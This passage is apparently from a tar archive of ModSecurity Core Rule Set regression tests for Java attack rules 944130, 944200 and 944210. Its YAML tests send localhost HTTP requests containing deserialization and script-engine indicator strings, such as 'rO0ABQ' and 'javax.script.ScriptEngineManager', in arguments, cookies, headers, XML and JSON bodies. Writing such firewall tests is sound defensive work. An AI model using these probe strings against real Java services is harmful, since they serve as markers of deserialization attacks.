Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.lang.System\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-385 desc: "Argument test includes keyword javax.script.ScriptEngineManager" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=javax.script.ScriptEngineManager" output: log_contains: "id \"944130\"" - test_title: 944130-386 desc: "Argument name includes keyword javax.script.ScriptEngineManager" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "javax.script.ScriptEngineManager=test" output: log_contains: "id \"944130\"" - test_title: 944130-387 desc: "Cookie test includes keyword javax.script.ScriptEngineManager" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=javax.script.ScriptEngineManager method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-388 desc: "Cookie name includes keyword javax.script.ScriptEngineManager" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: javax.script.ScriptEngineManager=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-389 desc: "Request header test includes keyword javax.script.ScriptEngineManager" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: javax.script.ScriptEngineManager method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-390 desc: "XML attribute value includes keyword javax.script.ScriptEngineManager" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-391 desc: "XML element value includes keyword javax.script.ScriptEngineManager" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "javax.script.ScriptEngineManager" output: log_contains: "id \"944130\"" - test_title: 944130-392 desc: "Nested XML element value includes keyword javax.script.ScriptEngineManager" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "javax.script.ScriptEngineManager" output: log_contains: "id \"944130\"" - test_title: 944130-393 desc: "Content-Type text/plain includes keyword javax.script.ScriptEngineManager" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=javax.script.ScriptEngineManager" output: log_contains: "id \"944130\"" - test_title: 944130-394 desc: "Content-Type application/json arg value includes keyword javax.script.ScriptEngineManager" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"javax.script.ScriptEngineManager\"}" output: log_contains: "id \"944130\"" - test_title: 944130-395 desc: "Content-Type application/json arg name includes keyword javax.script.ScriptEngineManager" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"javax.script.ScriptEngineManager\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-396 desc: "Argument test includes keyword org.apache.commons" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=org.apache.commons" output: log_contains: "id \"944130\"" - test_title: 944130-397 desc: "Argument name includes keyword org.apache.commons" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "org.apache.commons=test" output: log_contains: "id \"944130\"" - test_title: 944130-398 desc: "Cookie test includes keyword org.apache.commons" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=org.apache.commons method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-399 desc: "Cookie name includes keyword org.apache.commons" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: org.apache.commons=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-400 desc: "Request header test includes keyword org.apache.commons" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: org.apache.commons method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-401 desc: "XML attribute value includes keyword org.apache.commons" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-402 desc: "XML element value includes keyword org.apache.commons" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "org.apache.commons" output: log_contains: "id \"944130\"" - test_title: 944130-403 desc: "Nested XML element value includes keyword org.apache.commons" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "org.apache.commons" output: log_contains: "id \"944130\"" - test_title: 944130-404 desc: "Content-Type text/plain includes keyword org.apache.commons" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=org.apache.commons" output: log_contains: "id \"944130\"" - test_title: 944130-405 desc: "Content-Type application/json arg value includes keyword org.apache.commons" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"org.apache.commons\"}" output: log_contains: "id \"944130\"" - test_title: 944130-406 desc: "Content-Type application/json arg name includes keyword org.apache.commons" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"org.apache.commons\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-407 desc: "Argument test includes keyword org.omg.CORBA" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=org.omg.CORBA" output: log_contains: "id \"944130\"" - test_title: 944130-408 desc: "Argument name includes keyword org.omg.CORBA" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "org.omg.CORBA=test" output: log_contains: "id \"944130\"" - test_title: 944130-409 desc: "Cookie test includes keyword org.omg.CORBA" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=org.omg.CORBA method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-410 desc: "Cookie name includes keyword org.omg.CORBA" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: org.omg.CORBA=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-411 desc: "Request header test includes keyword org.omg.CORBA" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: org.omg.CORBA method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-412 desc: "XML attribute value includes keyword org.omg.CORBA" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-413 desc: "XML element value includes keyword org.omg.CORBA" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "org.omg.CORBA" output: log_contains: "id \"944130\"" - test_title: 944130-414 desc: "Nested XML element value includes keyword org.omg.CORBA" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "org.omg.CORBA" output: log_contains: "id \"944130\"" - test_title: 944130-415 desc: "Content-Type text/plain includes keyword org.omg.CORBA" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=org.omg.CORBA" output: log_contains: "id \"944130\"" - test_title: 944130-416 desc: "Content-Type application/json arg value includes keyword org.omg.CORBA" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"org.omg.CORBA\"}" output: log_contains: "id \"944130\"" - test_title: 944130-417 desc: "Content-Type application/json arg name includes keyword org.omg.CORBA" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"org.omg.CORBA\": \"test\"}" output: log_contains: "id \"944130\"" ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml��������0000664�0000000�0000000�00000003151�14461225151�0027664�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "spartantri" enabled: true name: "944200.yaml" description: "Description" tests: - test_title: 944200-0FP desc: Argument test includes java serialization magic bytes, raw request stages: - stage: input: stop_magic: true dest_addr: "127.0.0.1" port: 80 raw_request: "POST / HTTP/1.0\r\nHost: localhost\r\nUser-Agent: ModSecurity CRS 3 Tests\r\nAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nAccept-Encoding: gzip,deflate\r\nAccept-Language: en-us,en;q=0.5\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 9\r\n\r\ntest=¬í\0\x05\r\n\r\n" output: no_log_contains: "id \"944200\"" - test_title: 944200-1 desc: Argument test includes java serialization magic bytes, base64 encoded request stages: - stage: input: dest_addr: "127.0.0.1" port: 80 encoded_request: "UE9TVCAvIEhUVFAvMS4wDQpIb3N0OiBsb2NhbGhvc3QNClVzZXItQWdlbnQ6IE1vZFNlY3VyaXR5IENSUyAzIFRlc3RzDQpBY2NlcHQ6IHRleHQveG1sLGFwcGxpY2F0aW9uL3htbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsdGV4dC9odG1sO3E9MC45LHRleHQvcGxhaW47cT0wLjgsaW1hZ2UvcG5nLCovKjtxPTAuNQ0KQWNjZXB0LUNoYXJzZXQ6IElTTy04ODU5LTEsdXRmLTg7cT0wLjcsKjtxPTAuNw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLGRlZmxhdGUNCkFjY2VwdC1MYW5ndWFnZTogZW4tdXMsZW47cT0wLjUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb250ZW50LUxlbmd0aDogOQ0KDQp0ZXN0PaztAAUNCg0K" output: log_contains: "id \"944200\"" �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml��������0000664�0000000�0000000�00000130550�14461225151�0027671�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "spartantri" enabled: true name: "944210.yaml" description: "Positive tests for rule 944210" tests: - test_title: 944210-0 desc: "Argument test includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=rO0ABQ" output: log_contains: "id \"944210\"" - test_title: 944210-1 desc: "Argument name includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "rO0ABQ=test" output: log_contains: "id \"944210\"" - test_title: 944210-2 desc: "Cookie test includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=rO0ABQ method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944210\"" - test_title: 944210-3 desc: "Cookie name includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: rO0ABQ=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944210\"" - test_title: 944210-4 desc: "Request header test includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: rO0ABQ method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944210\"" - test_title: 944210-5 desc: "XML element includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "value" output: no_log_contains: "id \"944210\"" - test_title: 944210-6 desc: "XML attribute name includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: no_log_contains: "id \"944210\"" - test_title: 944210-7 desc: "XML attribute value includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944210\"" - test_title: 944210-8 desc: "XML element value includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "rO0ABQ" output: log_contains: "id \"944210\"" - test_title: 944210-9 desc: "Nested XML element value includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "rO0ABQ" output: log_contains: "id \"944210\"" - test_title: 944210-10 desc: "Content-Type text/plain includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=rO0ABQ" output: log_contains: "id \"944210\"" - test_title: 944210-11 desc: "Content-Type application/json arg value includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: 